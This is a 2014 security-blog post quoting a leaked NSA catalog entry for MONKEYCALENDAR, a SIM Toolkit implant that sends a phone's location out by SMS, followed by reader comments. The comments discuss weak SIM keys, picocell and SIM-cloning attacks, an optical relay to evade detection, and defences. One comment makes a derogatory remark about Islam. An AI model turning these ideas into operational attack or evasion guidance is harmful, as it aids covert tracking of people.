MONKEYCALENDAR: NSA Exploit of the Day

Today's item from the NSA's Tailored Access Operations (TAO) group implant catalog:

MONKEYCALENDAR

(TS//SI//REL) MONKEYCALENDAR is a software implant for GSM (Global System for Mobile communication) subscriber identity module (SIM) cards. This implant pulls geolocation information from a target handset and exfiltrates it to a user-defined phone number via short message service (SMS).

(TS//SI//REL) Modern SIM cards (Phase 2+) have an application program interface known as the SIM Toolkit (STK). The STK has a suite of proactive commands that allow the SIM card to issue commands and make requests to the handset. MONKEYCALENDAR uses STK commands to retrieve location information and to exfiltrate data via SMS. After the MONKEYCALENDAR file is compiled, the program is loaded onto the SIM card using either a Universal Serial Bus (USB) smartcard reader or via over-the-air provisioning. In both cases, keys to the card may be required to install the application depending on the service provider's security configuration.

Unit Cost: $0

Status: Released, not deployed.

Page, with graphics, is here. General information about TAO and the catalog is here.

In the comments, feel free to discuss how the exploit works, how we might detect it, how it has probably been improved since the catalog entry in 2008, and so on.

Posted on February 14, 2014 at 3:19 PM • 15 Comments

Comments

Clive RobinsonFebruary 14, 2014 4:51 PM

The key detail here is,

    In both smartcard reader or via over-the-air provisioning. In both cases, keys to the card may be required to install the application depending on the service provider's security configuration

Some SIMs have reasonable quality crypto others have single DES or security holes large enough to push a tank though.

Aproximately 1/6 SIM cards are eaisly crackable today, back then it would have been over a third.

Further contrary to expectation not all service providers are that concerned about the security of SIM keys, which means "implanted employees" or "overnight black bag jobs" will get copies of them.

All that then has to happen is the handset associate with a "cell tower" controled by the attacker and out goes the OTA message.

As has been indicated befor a couple of hundred bucks will buy you a Pico-Cell and the other bits (amp directional antennas etc) to get the person in their home or office.

Alternativly a SIM can be "cloned" and just swapped by an operative who can get access to your phone for a couple of minutes. This works very effectivly when a person is not using their "home network" so if "customs/imigration" borrow your phone assume it's been "owned"...

Preston L. BannisterFebruary 14, 2014 5:19 PM

For this particular case, when passing through customs, you could swap out your SIM card for a dummy. But that only covers this case.

The larger question: Is there any feasible way of performing an audit of the contents of your cell phone? Both internal storage and SIM card?

My take is that for phones with non-removable internal storage, you are pretty much out of luck. Since the phone boots off possibly-subverted software, using the phone's CPU to do an audit is dubious at best. Audit software could make phones more resistant to subversion, but only that.

If all storage in the phone were removable, then you could perform an audit on a known-clean system. That still does not protect against hardware hacks. The old rule that security requires control over physical access, still applies.

TenThousandDeathsAndStillDyingFebruary 15, 2014 2:06 AM

This is one exploit I pretty much couldn't worry less about, it's kind of a dud. It's that tool in the bottom of the box you've never used and which no one knows the name of: something like a micrometer for the comparative measuring of tangents in irregular curves that is made to be used with astronaut gloves under water...

I don't worry much about GSM-anything in cell phones or anything else with cell-phone functionality (i.e. a SIM card or several).

This exploit is only useful/enabling against those who have SIM's at the extreme edges of coverage where "four+ circles" triangulation doesn't suffice: people on the edge of "nowhere" somewhere in the boonies or desert. For everybody else the TLA's will get their position at either higher or good-enough-anyway fidelity from simple service triangulation.

And I'll include remote gait detection in that: triangulation should do just fine for that as well against the vast amount of people. For other potential uses it's extremely unlikely the unlocked/military GSM (or service triangulation for that matter) has fidelity enough (request & reply propagation duration and queuing) to time your heartbeats or replace the use of the microphone(s) in eavesdropping/vibration detection, but if it did then I would be more concerned.

Hopefully some stupid politician or apparatchik gets the wrong idea from the contents of this post —Buran-time :)

Clive RobinsonFebruary 15, 2014 4:51 AM

@ TenThousand...

    This exploit is only useful/enabling against those who have SIM's at the extreme edges of coverage where "four+ circles" triangulation doesn't suffice: people on the edge of "nowhere" somewhere in the boonies or desert

I guess you don't travel much... and have a US centric viewpoint.

This is a tool to use on people who move around a lot with their phone mainly turned off.

You turn it on anywhere in range of a cell tower and like the proverbial "linit in a cage" it will sing out.

No problem with persons out of juresdiction where getting the meta data from a service provider might be difficult politicaly or legaly.

Further no real issue with people faking their location using high gain antennas and long cable runs or active path extenders. Because it's the phones own GPS reading that is being sent not the position fix on the "supposed" antenna.

There is also another issue, let's say you are "smarter than the average bear" and decide to remove or disable the GPS device in your phone... This system will tell those attackers with an interest and they can then just disable the phone so it becomes usless. You think you've bricked it yourself and thus don't be smart with your next phone...

Mike the goatFebruary 15, 2014 6:53 AM

Clive: this feels like deja vu. Weren't we speaking about just this topic only a short while ago?

I liked the concept of their other tool which monitored roaming to detect phones as they crossed into the United States. I expect that this would have real utility .... Until their targets wised up and stopped using cellphones all together.

TenThousandDeathsAndStillDyingFebruary 15, 2014 10:40 AM

Clive I think you've kind of proven my point about this exploit.

If one wants to turn off a phone these days one has to remove both the battery and the SIM(s). This tool isn't doing anything then.

I didn't consider people putting down half a kilometer of cable or relaying to the closest quarry, but if they're that clued in why would they have GSM or even use a local cell phone in the first place? Easier not to. Granted islam doesn't bring out the best or smartest in people so that's one explanation but it's still not much of an exploit as far as general added utility goes (the code could be a beauty).

There is no difference between the US and anywhere else. No constitution or law will be respected anywhere, no ethical boundary, no human right, and certainly no service provider defenses legal or otherwise: they might as well not be there. The only limiting factor is the reward to work ratio with an eye on future potential. If we/anyone wants to know how cows feel all we/they have to do is sit back and ruminate... :)

My phones and other SIM-enabled equipment does not have GSM, the phones each cost less than half a carton of cancer sticks, and globally their kind far outnumbers the etch-a-sketch 2.0 craze :)

Thankfully (both in this regard and many others except one or two in a few states) I am not an USian ("America" is dead; a piece of parchment covered in excrement and buried in a landfill, a ghost used for internal consumption): maybe it's counterintuitive but USians are the ones standing on the conveyor belt while the rest of the world (including MENA) are still in their pens unless they're both "valuable" and easy (politicians, power-brokers, terrorists) or the competition gets them.

Sure, the US isn't the only abattoir in town, I freely admit to that, but for me personally it is my far the biggest and closest one and like their closest competition (islam) they primarily eat their own (just as the USSR and the Third Reich did).

Clive RobinsonFebruary 15, 2014 11:33 AM

@ Mike the Goat,

    Clive: this feels like deja vu. Weren't we speaking about just this topic only a short while ago?

Yes here and other places. People tend to forget who realy owns their phone... At the end of the day it's who ever owns the SIM and uses it to do implants etc...

@ TenThousand...

First off the problem is not one of which deity --if any-- they chose to beleive in (remember Jews, Christians and Muslims all with there diferent sects all beleive in "the one God").

After all Columbian drug barons, Chechnen seperitists and many others know from experiance that the US with "rusty rivet" or similar can find Sat phones and drop a modified anti radar missile down the RF path when they are in use.

So sat phones are out thus the next best thing is the mobile network in which ever country they might be in. Often the choice for various political and economic reasons is one supplier.

Now without going into the issues of Frenzsl Zones and similar there are limits to what you can do with the RF side of mobile phones. The simplest is the "passive repeater" which is two high gain antennas connected by a length of low loss coax. You usualy see this with TV service where coverage does not go into valleys etc. So one antenna is pointed at the base station usually this is the highest gain antenna with narrowest beam width as the base station generaly does not "go walkabout". The user side is usually lower gain and designed to have a broad beam width to cover as much of the vally as possible. Such systems are simple and reliable but importantly cheap to implement and deploy and have a low footprint to surveilance.

What I would sugest these days is making a more complex system equivalent to a car hands free kit which uses very high frequency EM in either the visable or near IR bands and use simple optics --telescopes etc-- in sheild tubes to reduce beam width to a minimum. This way the mobile can be stuck on a roof top of a hospital or water tower etc etc which even the NSA should regard as a "bad publicity" target.

Now befor anyone accuses me of giving terrorists ideas the IRA were using optical command systems to detonate what we now call IEDs and it's been well documented in the public arena.

Terrorists are in effect "irregular forces" so like other forces irregular or not they need to communicate in a timely manner. They could get amature radio or CB or PMR systems or even WiFi but these are all fairly obvious to the likes of "rusty rivet" and thus using them is a "self signed execution order" and they know it. So for all it's defects mobile phones are still the best option available to them due to the number of users. It's well known that --supposadly-- AQ affiliated insurgents in Afghanistan use "burner" mobile phones for "spotter" / "indirect fire control" of heavy guns and mortars. UK/US forces use lightly modified consumer scanner equipment to get a warning of "spotters" but it's a problematic game in that it's only when they are under fire they get local sigint.

But my personal view is this TAO method is not for terrorists but foreign government ministers and senior business men. And for this it's probably the best fit they are going to need to do the job.

If you care to think back to the Greek Olympics it's more than likely this or a similar method was in use.

Secret PoliceFebruary 15, 2014 12:34 PM

FBI uses OTA updates on SIMs to track or implant spyware. Telecoms are either giving the NSA access to their OTA update keys like they do the FBI or the NSA steals them.

A SIM physical wrapper like TurboSIM can block incoming OTA

Secret PoliceFebruary 15, 2014 1:32 PM

Derp, of course you don't have to use a SIM at all, Android you can randomize your wireless MAC on boot or demand if you have root, then just use wifi encrypted voip like the program Ostel.

Chris AbbottFebruary 15, 2014 7:42 PM

I'm dying to know what they've put in 4G SIMs, including those that go in CDMA phones (used almost exclusively by Americans). Even though Android is open-source, I also would love to know what's in the factory/stock builds, and of course in all the bloatware you aren't allowed to uninstall without root. My firewall on my Android reports that something is always trying to phone home. "Android System" constantly tries to connect to things. Any ideas?

tomFebruary 16, 2014 9:57 AM

"After the MONKEYCALENDAR file is compiled, the program is loaded onto the SIM card using either a Universal Serial Bus (USB) smartcard reader or via over-the-air provisioning. In both cases, keys to the card may be required to install the application depending on the service provider's security configuration."

NY Times yesterday, last paragraph:

"The Australians have obtained nearly 1.8 million encrypted master keys, which are used to protect private communications, from the Telkomsel mobile telephone network in Indonesia, and developed a way to decrypt almost all of them, according to a 2013 N.S.A. document."

"The Americans and the Australians secretly share broad access to the Indonesian telecommunications system, the documents show. The N.S.A. has given the Australians access to bulk call data from Indosat, an Indonesian telecommunications provider, according to a 2012 agency document."

Knott WhittingleyFebruary 17, 2014 3:25 PM

Has anybody ever done a study of password capture by seeing what passwords people mistakenly type at the username/login/handle prompt, or into the password field if the first password they try doesn't work?

Seems to me that's got to be an effective way of capturing a lot of people's passwords for various accounts. I would guess that most people space out and type their password prematurely sometimes, or if a password doesn't work, they try other passwords they frequently use, rather than remembering for sure which password goes with which account.

I don't recall ever seeing this mentioned, but I'm not a security person. I've been wondering about it for years.

01February 21, 2014 4:04 AM

While I don't share TenThousand's paranoid outlook on triangulation (unless the area target happens to be in is a Flatland-style plain with no landscape, buildings, or interference to speak of), the operational utility of this little thingamajig seems limited to situations where you absolutely have to pillage phone's own geolocation data or the provider is grossly negligent about its keys (happens more often than one would like to think)

Still, it would be interesting to learn how to block SIM OTA updates (one obvious route, for older SIMs, would be to clone them yourself using some of the "researcher programmable SIM toolkits" which have a notably crippled SIMToolkit functionality)

TurboSIM/podsimka seems interesting in this regard, but one has to wonder how reliable it is, given that OTA suppression isn't exactly the functionality those kits were designed for in the first place.

Leave a comment

Allowed HTML: <a href="URL"> • <em> <cite> <i> • <strong> <b> • <sub> <sup> • <ul> <ol> <li> • <blockquote> <pre>

Photo of Bruce Schneier by Per Ervland.

Schneier on Security is a personal website. Opinions expressed are not necessarily those of Co3 Systems, Inc..